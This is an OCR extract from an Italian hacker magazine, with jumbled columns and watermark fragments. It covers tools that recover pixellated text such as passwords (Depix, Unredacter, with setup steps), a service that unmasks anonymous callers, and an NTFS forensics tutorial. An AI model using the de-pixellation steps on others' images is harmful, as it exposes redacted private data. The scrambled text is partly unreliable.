Tale approccio logico si ritrova anche
nell’algoritmo di Depix, un tool di
@

recupero delle password pixellate

negli screenshot, scritto in Python
e rilasciato a dicembre 2020 da Sipke

figura #2 Mellema (https://bit.ly/depix).

Nonostante le sue limitazioni, di cui
si parlerà, Depix ha avuto il grande
merito di riaccendere la discussione sul

Ai fini di un corretto riconoscimento

del testo pixellato, Depix necessita
che lo stesso abbia determinate
caratteristiche: colore dello sfondo, font
del testo, spaziatura dei caratteri ecc.
In caso contrario, il risultato potrebbe
risultare scadente o del tutto assente.

44

tema, sensibilizzando gli utenti
a non adottare più tali tecniche
(pixeling, blur, swirl, fuzzy, ecc.)
per celare dati sensibili. Uno degli
studi più significativi in questo
settore è stato pubblicato nel
2016 (https://bit.ly/depixpdf);
il paper mostra come l’utilizzo
di una particolare classe di modelli
statistici, cosiddetti “modelli
nascosti di Markov”, HMM (https://
it.wikipedia.org/wiki/Modello_di_
Markov_nascosto), consentano
di recuperare dalle immagini
stringhe di testo offuscato in
diversi contesti: vari tipi di font,
dimensioni dei caratteri,
dimensioni della griglia, offset dei
pixel e livello di rumore. Questo
approccio si basa sul successo
_n
ottenuto dall’impiego degli HMM
nelle tecniche di Machine Learning
e in particolare nel riconoscimento
vocale automatico usato per
recuperare sequenze di fonemi
lia
da espressioni vocali. Ebbene,
traendo spunto da questa ricerca
e basandosi sulle librerie di Depix,
a settembre 2021 lo sviluppatore
Jonas Schatz ha rilasciato il tool
ita
DepixHMM (https://bit.ly/
depixhmm) che si svincola
da alcuni dei limiti criticati
in Depix migliorando l’accuratezza
nella ricostruzione dei testi,
@
facendo registrare un concreto
passo in avanti a queste tecniche
di cracking.
LA CRITICA E LA SFIDA!
Ad agosto 2021, un ricercatore
di Jumpsec Labs, Caleb Herbert,
ha messo a dura prova Depix
in diversi scenari reali, giungendo
alla conclusione che si tratta
ancora di un tool a basso rischio
per la sicurezza. La ragione di
questa conclusione è che, per
risultare efficace, Depix richiede
PIXELLING
requisiti troppo stringenti. È solo il testo offuscato per sperare
nelle condizioni ideali previste dai che Depix riesca a deoffuscarli
sample dimostrativi (disponibili correttamente. Inoltre, se la scala
nel repository GitHub di Depix) o l’offset della pixellatura o la
che si ottengono risultati dimensione della casella è diversa
sbalorditivi, mentre risulta del da quella attesa, Depix non
tutto deludente su campioni che è in grado di restituire nulla.
introducono piccole variazioni e/o Allo stesso modo, se la pixellatura
rumori che in un contesto reale è stata eseguita con tool diversi
sono, però, da ritenersi del tutto da quelli supportati (basati su
normali. È necessario, infatti, algoritmi linear box filter),
s
conoscere a priori, o indovinare Depix non funziona. Sebbene
arbitrariamente, quali strumenti Jumpsec Labs ammetta che un
siano stati utilizzati per creare malintenzionato armato di Depix
ew
Per gli amanti del “fai da te”
Se volete mettere alla prova Unredacter con un testo diverso da quello
di default, potete digitarlo direttamente nel campo Make Your Own
Redacted Text e premere Redact Me. Così facendo verrà generata
una nuova immagine pixellata già ottimizzata con i parametri richiesti
da Unredacter per ottenere un risultato ottimale. Non resta che cliccare
il pulsante Click To Start per avviare la procedura di deoffuscamento.
IMMAGINE PERSONALE
Per deoffuscare il testo di una vostra immagine dovete prima aprirla in
GIMP, croppare la porzione pixellata accertandovi che nel ritaglio non siano
presenti bordi di finestre, elementi grafici o altri testi, ed esportarla in
formato PNG nella directory unredacter-main sovrascrivendo il file secret.
png in essa presente. Se avete creato la pixellatura con l’Effetto pixel
di GIMP (richiamabile dal menu Filtri/Sfocature), prendete nota del valore
relativo alla dimensione del blocco di pixel scelto (in termini di Larghezza
blocco e Altezza blocco) e riportatelo nella riga const blockSize nel codice
dello script modificando opportunamente il file main.ts che si trova
in C:\unredacter-main\src. La fase più critica per una corretta riuscita del
deoffuscamento consiste nell’individuare esattamente il tipo di carattere
utilizzato nell’immagine per replicarlo
quanto più fedelmente possibile
nel file CSS del tool (index.css).
Per aiutarsi in questa fase è possibile
inserire una porzione del testo
in chiaro nel file test.html
e visualizzarlo in Chrome,
modificandolo (prestando
attenzione alla spaziatura tra parole
e lettere, alla dimensione e allo stile
del carattere) finché il font non sia
il più esatto possibile. Aprendo con
un editor di testo il file preload.ts,
che si trova in C:\unredacter-
main\src, e agendo alla riga
const guessable_characters,
è possibile determinare il set
di caratteri da usare.
@
ita
lia
_n
ew
s
@
ita
lia
_n
ew
s
HOW TO
possa, con tanta fortuna, riuscire
a decifrare un testo offuscato,
ritiene che sia ancora lontana
l’ipotesi di far correre ai ripari
tutti coloro che negli anni hanno
condiviso immagini con
informazioni offuscate sul Web
o nei video di YouTube. Sicuro
di ciò, Caleb Herbert ha lanciato
pubblicamente una sfida agli
studiosi di tutto il mondo,
invitandoli a deoffuscare una
figura #3
stringa di caratteri pubblicata in
fondo al suo articolo (https://bit.ly/
candepix), relativo alla prova
sul campo di Depix.
UN POC DA PAURA
Il guanto di sfida lanciato da
Herbert è stato raccolto da Dan
Petro, ricercatore capo presso
Bishop Fox, che nel febbraio 2022
non solo ha vinto la challenge

s
mostrando in chiaro il testo
offuscato di Jumpsec Labs (https://
bit.ly/neverusepix), ma che ha

ew
Creando con un editor di testi una sequenza di De Bruijn (https://en. pubblicato su GitHub anche il
wikipedia.org/wiki/De_Bruijn_sequence) contenente tutte codice sorgente di Unredacter
le combinazioni previste di due caratteri, come mostrato in figura, (https://bit.ly/unredacter). Petro
e catturandone uno screenshot, è possibile usarlo in Depix come
è partito dall’ipotesi che in uno
immagine di ricerca di blocchi simili nel testo pixellato.
scenario reale l’attaccante sia
figura #4 in qualche modo a conoscenza
_n
del tipo di font utilizzato e della
dimensione del corpo del
carattere. È plausibile pensare,
infatti, che lo stesso sia in
possesso di uno screenshot di cui
lia

solo alcune porzioni del testo

Il ritaglio della porzione di immagine pixellata è fondamentale per siano state pixellate per celare
un corretto deoffuscamento. Nella guida di DepixHMM viene indicato informazioni sensibili. Analizzando
il bordo verde (che lascia una fila di pixel in alto e due in basso) come quindi l’intero documento e il
crop corretto da eseguire. Questo sebbene sia più intuitivo ritagliare contesto di un’immagine è logico
ita

lungo il bordo rosso mostrato nell’immagine di esempio, a causa della

pensare che sia possibile
dimensione del carattere e all’offset y della pixellatura.
determinare non soltanto il font,
figura #5 ma anche la sua dimensione.
Sulla scorta di ciò, Petro si è
concentrato sull’implementare
@

delle soluzioni in grado di gestire

le criticità riscontrate in Depix (del
cui algoritmo sposa comunque la
logica di fondo) per risultare più
efficace. Tra questi vi è il bleed-
over dei caratteri (ossia la
condivisione della stessa griglia
di pixel da parte di due caratteri
contigui), la spaziatura (bianca) tra
gli stessi, la larghezza dei caratteri
Se volete dormire sonni tranquilli, ricordatevi di “distruggere” tutte dei font (ossia lo spazio
le informazioni che volete cancellare. In GIMP, per esempio, potete orizzontale occupato da ciascuna
usare lo Strumento pennello e il colore nero per piazzare una bella lettera, che varia nei casi in cui il
banda di omissis sui testi. font non sia di tipo monospace),

46
 PIXELLING
l’incoerenza dovuta ai diversi Unredacter:
motori di rendering (che tendono come craccare i testi pixellati
a mostrare output leggermente
diversi anche se il font utilizzato #1
è il medesimo) e lo scostamento
della pixellatura (ossia le
coordinate di offset x e y che
determinano la posizione
del testo all’interno della griglia).
Per ripristinare un testo,
Unredacter utilizza sempre il

s
metodo di selezione inversa: parte
dall’immagine originale pixellata
e la confronta con una variante Procuratevi il pacchetto

ew
sintetizzata enumerando coppie Dal sito https://bit.ly/unredacter cliccate sul pulsante verde Code
e poi sul link Download ZIP per scaricare l’ultimo commit disponibile
di caratteri pixellati, ma con diversi
di Unredacter. Infine, estraete il file unredacter-main in un percorso
spostamenti e caratteristiche. facile da raggiungere (per esempio nella root C:\).
Durante la procedura di
enumerazione, quindi, Unredacter
#2
seleziona gradualmente la
_n
variante che più si avvicina al
frammento originale. A differenza
di Depix, infatti, non ha bisogno
di trovare una corrispondenza
esatta, ma accetta ipotesi che
lia

siano “per lo più” giuste.

Risultando più raffinato ed
efficace di Depix (che di fatto
è una via di mezzo tra un cracking Installate le dipendenze
Per funzionare, Unredacter ha bisogno di installare alcune
brute force e un attacco
ita

dipendenze tramite il Node Package Manager. Pertanto, dal sito

“a dizionario”), l’algoritmo
implementato in Unredacter
dimostra che il rischio di sicurezza
legato al deoffuscamento della
pixellatura (et similia) è in realtà
@
https://nodejs.org/it/ scaricate e installate la versione consigliata di
Node.js. Avviate il prompt (cmd), portatevi nella directory del tool
(C:\unredacter-main) e digitate il comando npm install.
#3

ben più alto di quello che si possa

immaginare. Per questa ragione,
da oggi in poi, se dovete oscurare
porzioni di testo in un’immagine,
usate soltanto metodi distruttivi
dei pixel. Come?
Con il vostro software di
fotoritocco preferito tracciate una
bella banda nera direttamente
Ora potete usare il tool!
sulle informazioni da nascondere; Scaricati tutti i pacchetti delle dipendenze, impartite il comando
e se usate i livelli, ricordatevi alla npm start. Dopo qualche secondo verrà caricata la schermata
fine di salvare il file in un formato di Unredacter. Per mettere subito alla prova il tool con l’immagine
che non li supporti (non PSD e TIFF pixellata di esempio secret.png (presente in unredacter-main),
premete Click to Start e… attendete pazientemente.
ma JPEG, PNG ecc.).

47
HOW TO

COME
RENDERE
VISIBILE
UN NUMERO

s
ew
PRIVATO! _n
C’è un modo gratuito per “smascherare” chi effettua telefonate
usando il prefisso #31# per non farti vedere il suo numero

R
icevere telefonate da un che ha intenzione di combinarvi solo
IN BREVE
numero privato e anonimo uno scherzo. Se avete intenzione
lia

Ecco come funziona il

servizio che vi permette
di individuare il numero
della persona che vi
chiama con l’anonimo.
ita
è un qualcosa di molto
fastidioso. Se poi tali chiamate
iniziano a diventare insistenti
e arrivano a qualsiasi ora del giorno
e della notte la storia inizia a diventare
di “sgamarlo” potete utilizzare
un’applicazione mobile che consente
di “smascherare” il furbetto in vena
di prendervi in giro. Vi ricordiamo che
per effettuare chiamate anonime non

DIFFICOLTÀ
seccante e preoccupante. Può capitare
che dietro a una telefonata anonima
ricevuta si nasconda un vostro amico
@
servono operazioni complicate da fare.
Tutti gli operatori, infatti, consentono
di poter effettuare telefonate

Alternative a Whooming
• L’app TrueCaller fornisce un servizio che fa della condivisione il suo punto di forza. In pratica, promette di risolvere
il problema verso le chiamate provenienti da numeri privati (non anonimi, ndr) mediante una sorta di registro creato
dagli utenti. È chiaro, quindi, che per funzionare, necessita della condivisione del proprio numero di cellulare
e dell’intera nostra rubrica. Noi della redazione sconsigliamo la condivisione di tutte queste informazioni con i server
di TrueCaller, nonostante il servizio sia utile e funzioni molto bene.
Web: https://www.truecaller.com/

• Should I Answer? è un’altra app in grado di identificare (e bloccare) le chiamate che provengono da numeri
di telefono di operatori di telemarketing che sono inseriti in un database che viene aggiornato ogni giorno tramite
le segnalazioni degli utenti. Al contrario di TrueCaller, Should I Answer? non necessita della condivisione del proprio
numero di telefono, quindi si può dire che rispetta la nostra privacy, ma ovviamente non sortisce gli stessi risultati.
Web: https://www.shouldianswer.com/

48
 SCOCCIATORI
Registro delle opposizioni Abbonarsi
Per proteggersi dal “telemarketing selvaggio” potete iscrivervi al servizio:
vantaggi
gratuitamente al registro delle opposizioni (www.registrodelleopposizioni.
it). L’iscrizione può essere richiesta da tutti i possessori di una linea
telefonica fissa, la cui utenza risulti inserita negli elenchi telefonici
pubblici. Inoltre, a partire dal 27 luglio di quest’anno, il registro delle
opposizioni sarà attivo anche per i numeri di cellulare. e costi!
Whooming funziona in modo
totalmente gratuito: per i primi
nascondendo il proprio numero. non è obbligatoria l’installazione sette giorni dalla registrazione

Come? Banalmente inserendo un
codice davanti al numero che si
vuole contattare: #31#. Questo
dell’applicazione sul telefono,
ma basta solo configurare la
deviazione di chiamata, possibilità
s
è incluso l’abbonamento
Premium con il quale potete
vedere immediatamente i numeri

escamotage funziona con tutti
gli operatori di telefonia mobile,
mentre da rete fissa il codice
da usare è *67#.
LO SCOVA NUMERI
_n
In questa guida vi presentiamo il
servizio Whooming (https://bit.ly/
whoomingfull) che consente
di risolvere il “problema” delle
chiamate anonime. Tramite la sua
lia
ew
offerta da qualunque operatore
mobile e poi, successivamente,
scorrere la lista delle chiamate
accedendo al servizio su Internet.
TECNICA DELL’INOLTRO
Il servizio offerto da Whooming
funziona tramite la cosiddetta
tecnica dell’inoltro di chiamata:
in sostanza tutte le telefonate
rifiutate verranno inoltrate verso
anonimi che vi contattano, sia
dando l’occupato alla telefonata
e sia se arrivano le chiamate
durante un’altra conversazione.
Le opzioni per un abbonamento
invece sono: 3 mesi 11,99 euro;
6 mesi 17,99 euro; un anno
23,99 euro. Gli abbonamenti
contemplano anche delle opzioni
in più rispetto alla versione
gratuita. In particolare
avrete la possibilità di:
• far sentire la linea libera ai
mittenti delle chiamate anonime

mentre il sistema avrà già messo

applicazione, disponibile sia per
dispositivi Android che iOS, avrete
la possibilità di individuare senza
troppe difficoltà l’identità di chi vi
sta contattando in modo anonimo.
ita
un numero che ci viene assegnato
direttamente dal servizio; basterà
poi aprire la lista dall’applicazione
o dal sito Internet di Whooming
e vedere chi vi sta chiamando.
in chiaro il numero;
• avviare la registrazione delle
conversazioni intercettate;
• avviare il download delle
registrazioni sul vostro computer;

• inviare notifiche SMS per

Funziona sia sulla linea del
cellulare (con tutti gli operatori),
che sulla linea fissa. Uno dei suoi
punti di forza è la compatibilità
con tutti i tipi di linea mobile:
@
La versione base è gratuita ricevere un messaggio con
e, per i primi sette giorni, si ha il numero di chi ha chiamato.
l’abbonamento Premium incluso.
Con questo pacchetto si possono
vedere subito i numeri che ci

il servizio in pratica funziona stanno contattando.

con tutti i cellulari e non solo
con gli smartphone di ultima
generazione. È sfruttabile, in altre
parole, anche con i classici cellulari
privi di connessione a Internet.
Per poter usare Whooming, infatti,
Trascorso il periodo di prova
di sette giorni, si dovrà aspettare
ventiquattro ore dalla telefonata
per poter visualizzare il numero
con le ultime quattro cifre coperte
da asterischi.

Chiamare con numero privato

è molto facile... ma lo è anche
sgamare chi lo fa grazie a Whooming
HOW TO
Preparate la trappola per chi ci chiama
PASSO 1
Scaricate l’applicazione
Whooming dal Play Store
(è disponibile anche per iOS).
Dopo averla installata vi
verrà richiesto di effettuare
l’accesso tramite una
semplice registrazione.
Si può fare tramite email,
Google o Facebook. Optate
per la nuova iscrizione:
ew
la procedura è molto
semplice e l’app vi segue in
tutta l’operazione. Tappate
sul pulsante Iscriviti.
PASSO 3
_n
Adesso dovete impostare
la deviazione di chiamata:
basta premere sul tasto
verde ed effettuare la
chiamata al numero che
appare sul display. Dopo
lia
aver attivato la deviazione
di chiamata, che verrà
confermata con un
messaggino, tornate
nell’app e cliccate OK sono
ita
Pronto.
PASSO 5
@
D’ora in poi vi basterà
rifiutare le chiamate
provenienti da numeri
sconosciuti per vederle
subito in chiaro nella
schermata Registro
Chiamate di Whooming.
Ricordatevi che per i primi
sette giorni il servizio
è gratuito e che, poi, con
la versione base dovranno
passare 24 ore prima
di poter visualizzare
il risultato.
50
PASSO 2
Confermate la registrazione
al servizio riportando
nell’apposito campo il codice
che vi è stato inviato
all’indirizzo email utilizzato
per la registrazione; tappate
su Verifica. A questo punto
s
dovete inserire il paese,
l’operatore della vostra linea
e il numero di cellulare
sul quale si vuole attivare
il servizio.
PASSO 4
A questo punto,
l’applicazione vi farà
effettuare una prova
utilizzando il vostro numero.
Dopo aver effettuato
la telefonata di prova
vi apparirà la schermata
in cui viene confermata
l’attivazione del servizio
Whooming. Premete adesso
il tasto Vai a lista chiamate
e concedete l’accesso
ai vostri contatti.
PASSO 6
Se non volete più utilizzare
il servizio offerto da
Whooming sarà sufficiente
digitare ##002# sul
tastierino numerico del
vostro telefono e inoltrare
la chiamata. Al termine di
questa operazione apparirà
un messaggio sullo schermo
che vi darà conferma
della disattivazione
del servizio. Finito!
 ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!

CONSEGNA GARANTITA ENTRO 48H

s
ew
_n
lia

Con l’abbonamento
ita

cartaceo la versione
digitale è in OMAGGIO!

Riceverai 12 numeri a soli

DISPONIBILE ANCHE SOLO
@

IN VERSIONE DIGITALE

-28% -57%
CARTACEO DIGITALE
12 numeri 12 numeri
solo 33,90€ solo 19,90€
invece di 46,80€ invece di 46,80€

Scansiona il QrCode per abbonarti oppure contattaci

Telefono online email WhatsApp
02 87168197 www.sprea.it/hackerjournal [email protected] 329 3922420
Solo messaggi
Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbonamento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre
previo suo consenso i suoi dati potranno essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse di terzi. 2) Finalità connesse alla comunica-
zione dei suoi dati personali a soggetti operanti nei settori editoriale, largo consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo, automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e 2). Per tutte
le finalità menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteranno per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al
confezionamento. L’elenco aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento e gratuitamente esercitare i diritti previsti dall’articolo 7
del D.Lgs.196/03 – e cioè conoscere quali dei suoi dati vengono trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea SpA via Torino 51 20063 Cernusco SN (MI).
HOW TO

Alla scoperta di NTFS!

TERZA PA
RT E

Vediamo come il filesystem NTFS,

tipico dei sistemi Windows, conserva i file

N
IN BREVE elle precedenti puntate • Kape, per l’estrazione della MFT
abbiamo imparato a di dischi formattati con NTFS,
Studiamo a fondo

s
conoscere il filesystem di propedeutica alla successiva analisi
le caratteristiche
di uno dei filesystem
Windows, NTFS (New da parte di tool “post mortem”;
Technology File System), che ormai • MFTexplorer che, pur richiedendo (al

ew
più diffusi.
sappiamo essere diviso in tre grandi
DIFFICOLTÀ
macroaree visibili in [figura #1] e
spiegate nel box La struttura di NTFS.
NTFS & TOOL
La larghissima diffusione di NTFS e la
_n
sua versatilità hanno favorito la nascita
di tantissimi tool specialistici: nelle
scorse puntate abbiamo visto alcuni
di quelli più rappresentativi, ciascuno
dotato di specifiche caratteristiche
lia
contrario di NTFStool) la propedeutica
estrazione della MFT della partizione
da analizzare, ne consente l’esame
in formato grafico, con un’apposita
GUI in grado semplificare l’analisi
da parte dell’utente.
Usando questi strumenti, siamo riusciti
ad addentrarci nell’analisi della Master
File Table e dei file record relativi ai
principali metafile del filesystem.
Ma come viene memorizzato, invece,

in grado di distinguerlo dagli altri. un file “ordinario”?

Stiamo parlando di software come:
• NTFStool, che abbiamo utilizzato per
esaminare in tempo reale, dal prompt
dei comandi, i contenuti dei file record
ita
ESAMINARE I FILE
La risposta, per quanto banale, è:
nello stesso modo. A seconda delle

di partizioni NTFS; dimensioni, tuttavia, i dati del file

potrebbero essere immagazzinati (al
contrario di quanto visto per i metafile
di NTFS) interamente all’interno del
relativo file record. Per osservare più
@

da vicino questo comportamento,

abbiamo bisogno innanzitutto di
estrarre un’immagine bit a bit della
partizione su cui intendiamo lavorare.
Riprendiamo allora la nostra fidata
(e datata) chiavetta USB da 1 GB,
formattiamola con NTFS (per “pulire”
le strutture del filesystem) e inseriamo
al suo interno tre file di testo
semplicissimi:
• il primo, che chiameremo
filesystem.txt, contenente la stringa
figura #1 “Lezione su NTFS”;
L’homepage di Cygwin, www.cygwin.com • il secondo, da nominare hj.txt,

52
 FILESYSTEM
La schermata dell’installer di
Cygwin per la selezione delle
caratteristiche della nostra
connessione a Internet.

La struttura figura #2
di NTFS
Ecco le tre macroaree che
compongono la struttura
del filesystem NTFS:

s
• boot sector, l’area iniziale
del disco/partizione, ove sono
conservate le informazioni

ew
di base sul filesystem (tra cui la
dimensione dei cluster, concetto
che può essere approfondito
nel box Settori e cluster), i dati
necessari per il bootstrap (ovvero
il caricamento del sistema
operativo) e quelli per l’accesso
_n
a tutte le strutture utilizzate
per la gestione del filesystem;
• la Master File Table (MFT),
la struttura principale di NTFS
(a cui non a caso è dedicato il box
di approfondimento omonimo), figura #3
che possiamo immaginare come
lia

un’enorme tabella in cui, per

ciascun file della partizione,
è presente un elemento (detto
MFT entry o file record)
contenente tutte le relative
informazioni, come dimensione,
ita

flag, directory di appartenenza

e il relativo contenuto (o quanto
meno l’indirizzo dei cluster ove
tale contenuto è memorizzato);
• l’area dati, che ospita
concretamente i file residenti
@

nella partizione.

La schermata dell’installer di
Cygwin per la selezione del
mirror da cui scaricare i vari
programmi che utilizzerete.

contenente la frase: “File filesystem pulito ed elementare: a bit del nostro filesystem, da
di esempio Hacker Journal”; insomma, un ottimo banco di test “dare in pasto” successivamente al
• nel terzo, dd.txt, inseriamo per i nostri esperimenti! tool per l’analisi. Sebbene sia tipico
il manuale di dd (uno dei tool che dei sistemi GNU/Linux, è possibile
introdurremo in questa puntata), CYGWIN accedervi anche in ambiente
che possiamo reperire al link Il software di cui abbiamo copiato Windows, grazie alla suite Cygwin.
https://ss64.com/bash/dd.html. il manuale, dd, è quello che ci Per chi non la conoscesse, Cygwin
In questo modo, disponiamo di un consentirà di estrarre una copia bit può essere vista come una

53
HOW TO
L’estrazione dell’immagine bit a bit della chiavetta USB,
mediante il tool dd incluso in Cygwin.
collezione di tool in grado di
fornire ai sistemi Microsoft
_n
funzionalità comparabili a quelle
di una qualsiasi distro GNU/Linux.
Possiamo scaricare l’ultima
versione di Cygwin dal sito Web
del progetto (www.cygwin.com),
lia
selezionando il link setup-x86_64.
exe [figura #1]. Non vi stupite
se il download procede “troppo”
rapidamente: si tratta solo
del pacchetto iniziale, mentre
ita
i software veri e propri saranno
scaricati soltanto nel corso
dell’installazione. Una volta
completato il download:
• avviamo l’installer con un doppio
@
click e forniamo le nostre
autorizzazioni amministrative;
• accettiamo le scelte di default
proposte, a eccezione
di quelle per la selezione della
tipologia di connessione (nella
stragrande maggioranza dei casi
è sufficiente optare per direct
connection – [figura #2])
e del mirror da utilizzare
per il download [figura #3].
L’homepage di Sleuthkit,
www.sleuthkit.org
54
figura #4
figura #5
ew
ESTRARRE L’IMMAGINE
Al termine dell’installazione,
possiamo avviare Cygwin cliccando
sulla relativa icona presente sul
desktop. Inseriamo la nostra
chiavetta USB nel PC, annotiamo
la lettera che Windows assegnerà
al relativo drive, quindi
visualizziamo l’elenco dei dischi
presenti nel sistema,
con il comando
$ cat /proc/partitions
Come possiamo notare, l’output
di questo comando riporta,
L’elenco, fornito da Cygwin,
delle partizioni accessibili
dal sistema operativo.
accanto al nome di ciascuna
partizione a noi accessibile
[figura #4], sia il punto di mount
di Windows (ovvero la lettera
associata alla partizione),
sia il nome del corrispondente
device da utilizzare in Cygwin.
Nel nostro caso, alla chiavetta USB
s
è possibile accedere mediante la
lettera E:\ (se utilizziamo il sistema
operativo sottostante) oppure
attraverso il file di device /etc/
sdb1: è questo il file da tenere
a mente per estrarre l’immagine
del supporto di memoria,
operazione che richiede la sintassi
$ dd if=/dev/sdb1
of=chiavetta.dd bs=1024
Una volta avviato questo
comando, il già citato tool dd
effettuerà una copia bit a bit
della nostra chiavetta,
salvando l’immagine creata nel file
chiavetta.dd [figura #5].
SLEUTHKIT
Finalmente disponiamo di
un’immagine della nostra chiavetta
USB: e adesso? Il prossimo step
figura #6
 FILESYSTEM
figura #7 da utilizzare è fsstat: è sufficiente
digitare dal prompt la stringa
seguente

> fsstat.exe chiavetta.dd

è rappresentato dall’installazione
di The Sleuthkit (TSK), una suite
La pagina per
il download
di Sleuthkit. per ottenere una panoramica
abbastanza completa delle
caratteristiche del filesystem.
e, soprattutto, liberamente Come possiamo notare in [figura
impiegabili. Una volta effettuato #8], l’output del comando riporta

s
per l’analisi forense dei filesystem. il download dei binari più recenti tre tipologie di informazioni,
Con una storia ventennale alle disponibili per Windows suddivise in altrettante sezioni:
spalle, Sleuthkit si è ritagliato nel [figura #7], non ci resta che • informazioni di carattere

tempo uno spazio di rilievo nel
settore, sino ad affermarsi come
uno dei prodotti di riferimento
nel campo dell’analisi forense,
grazie anche alla varietà
dei filesystem analizzabili (non
_n
solo NTFS ma anche, tra gli altri,
le varie versioni di EXT
– il filesystem più utilizzato
in ambiente GNU/Linux –
FAT, ExFAT, ISO 9660) e dei sistemi
lia
ew
decomprimere il pacchetto per generale (sezione FILE SYSTEM
avere già pronti all’uso tutti i tool INFORMATION), come il seriale
della suite, comodamente raccolti del volume o il nome OEM
nella sottodirectory bin. (che, per i supporti formattati
in ambiente Windows, assume
UN ESAME VELOCE di norma il valore “NTFS”);
Anche se il nostro scopo in questa • informazioni sulla Master File
sede è analizzare
i file contenuti
nell’immagine,
figura #8
non possiamo Il comando

operativi supportati (oltre esimerci da uno fsstat mostra

i dati salienti
a Windows, TSK è installabile sguardo veloce alle
del filesystem.
anche nei sistemi GNU/Linux, caratteristiche
macOS X, Open & FreeBSD, del filesystem,
Solaris). Non ultimo, i tool di cui anche nell’ottica
ita

si compone la suite – nonché il di una comparazione

framework stesso – sono Software completa dei tool
Libero, rilasciati sotto le licenze (e delle relative
“IBM Public License” e “Common feature) presentati
Public License”: sono scaricabili in queste puntate.
@

gratuitamente dal sito del progetto Nel caso di The

(www.sleuthkit.org, [figura #6]) Sleuthkit, il comando

SETTORI E CLUSTER
P er gestire la memorizzazione delle
informazioni, i byte di cui è composto un
disco sono suddivisi in settori, aree logiche
dalla dimensione omogenea. I settori, a loro
volta, vengono raggruppati in cluster, in una
proporzione variabile – entro i parametri
previsti dalle specifiche del filesystem – stabilita
all’atto della formattazione.
Il cluster costituisce l’unità minima di
allocazione: indipendentemente dalla sua reale
dimensione (fosse anche un singolo byte!),
ogni file occupa almeno un cluster su disco
(ed ecco la disparità che a volte si può notare
smanettando con le proprietà di dischi, file
e directory, tra le dimensioni reali del file
e le dimensioni occupate su disco!).

55
HOW TO
Table (sezione METADATA
INFORMATION), tra cui il relativo
cluster di allocazione (nonché
quello della sua copia, $MFTMirr),
la dimensione di ogni file record
(struttura che Sleuthkit denomina
“MFT Entry”), il file record della
root directory del filesystem;
• informazioni sui contenuti veri
e propri del filesystem (sezione
CONTENT INFO), come le
MFT & FILE
Contrariamente a quanto abbiamo
visto con i tool trattati
in precedenza, i dati mostrati
da fsstat non derivano
dall’interrogazione della
Master File Table, quanto
piuttosto dal boot sector.
Per accedere alla MFT – e ai dati
ivi memorizzati – Sleuthkit
ci mette a disposizione
possiamo visualizzare l’elenco
dei file contenuti nell’immagine
[figura #9], che Sleuthkit
si preoccupa di ricavare,
in maniera del tutto trasparente
all’utente, da un’apposita
interrogazione della MFT:
il programma si limita
a scandire tutti i file record
presenti nella MFT, stampando
a video – per quelli che risultano

s
dimensioni (e il numero) di settori altri comandi, a iniziare in uso – il nome del file a cui l’entry
e di cluster e le caratteristiche da fls. Digitando fa riferimento, nonché il relativo
degli attributi definiti all’interno indice numerico all’interno

ew
del filesystem. > fls.exe -r chiavetta.dd della tabella. A tal proposito,
i lettori più attenti potrebbero
aver notato un’apparente

Master File Table

contraddizione. Come abbiamo
avuto modo di spiegare (e “toccare
con mano”) nelle precedenti
_n
Gran parte del design di NTFS può essere sintetizzato con due concetti:
la Master File Table e l’assunto che “ogni oggetto è un file”. puntate, gli indici dei file record
Che si tratti del boot sector, della root directory o dei metadati deputati sono semplici valori numerici
alla gestione del filesystem (compresa la stessa Master File Table), che ne stabiliscono la posizione
tutto viene rappresentato da NTFS sotto forma di file. all’interno della MFT, misurandola
Possiamo pensare alla MFT come una gigantesca tabella, che associa
in termini di offset dal primo
lia

a ciascun file presente nel filesystem un elemento detto MFT entry o file
record. Ogni file record è identificato univocamente da un apposito indice, elemento (indice 0 per la prima
che ne specifica la posizione all’interno della tabella: entry, 1 per la seconda, 2 per la
• il primo file record ha indice pari a 0, e contiene gli attributi relativi terza e così via): ma allora perché
al file $MFT, che identifica la MFT stessa;
fls riporta questi stessi indici
• il secondo (indice 1) fa riferimento al file $MFTMirr,
in un formato x-y-z, formato da tre
ita

ovvero la copia della MFT;

• il sesto (indice 5) rappresenta la root directory del filesystem (.), interi piuttosto che da uno?
l’ottavo il boot record ($Boot), mentre gli elementi dall’indice 27
in poi sono generalmente associati a file ordinari; INFORMAZIONI SUI FILE
Inoltre la MFT ha una struttura composta da due grandi aree:
La risposta sta nelle peculiarità
• un header iniziale, contenente informazioni di carattere generale,
di NTFS che, come vedremo
@

come la dimensione effettiva e allocata su disco o il numero di sequenza

(che indica il numero di riutilizzi del file record, incrementandosi ogni nelle prossime puntate, consente
volta che il file associato viene cancellato e ricreato); di associare più flussi di dati
• una lista di attributi, il cui contenuto varia da attributo ad attributo. a un singolo file: può quindi
Sono proprio gli attributi a definire il file: in NTFS, infatti, un file non
è altro che un insieme di attributi. Tra questi, è opportuno segnalare: capitare che in una entry MFT
• $DATA, l’attributo a cui è affidato il compito di conservare il contenuto siano presenti più istanze
del file. Generalmente è un attributo non residente, ovvero esterno dell’attributo $DATA (fate
